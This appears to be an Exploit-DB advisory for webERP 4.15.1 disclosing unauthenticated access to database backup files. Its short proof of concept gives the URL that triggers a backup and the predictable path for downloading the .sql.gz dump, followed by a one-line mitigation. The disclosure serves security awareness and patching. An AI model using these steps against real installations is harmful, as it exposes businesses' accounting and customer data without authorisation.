webERP 4.15.1 - Unauthenticated Backup File Access

vendor:

webERP

by:

Besim ALTINOK

7.5

CVSS

HIGH

Unauthenticated Backup File Access

532

CWE

Product Name: webERP

Affected Version From: 4.15.1

Affected Version To: 4.15.1

Patch Exists: NO

Related CWE: N/A

CPE: a:weberp:web_erp

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xampp

2020

webERP 4.15.1 – Unauthenticated Backup File Access

webERP is a complete web-based accounting and business management system that requires only a web-browser and pdf reader to use. It has a wide range of features suitable for many businesses particularly distributed businesses in wholesale, distribution, and manufacturing. This vulnerability allows an attacker to access the backup file of the webERP application without authentication. The attacker can access the backup file by accessing the URL http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

Mitigation:

Ensure that the backup files are not accessible to unauthorized users.

Source

Exploit-DB raw data:

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
-- 
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz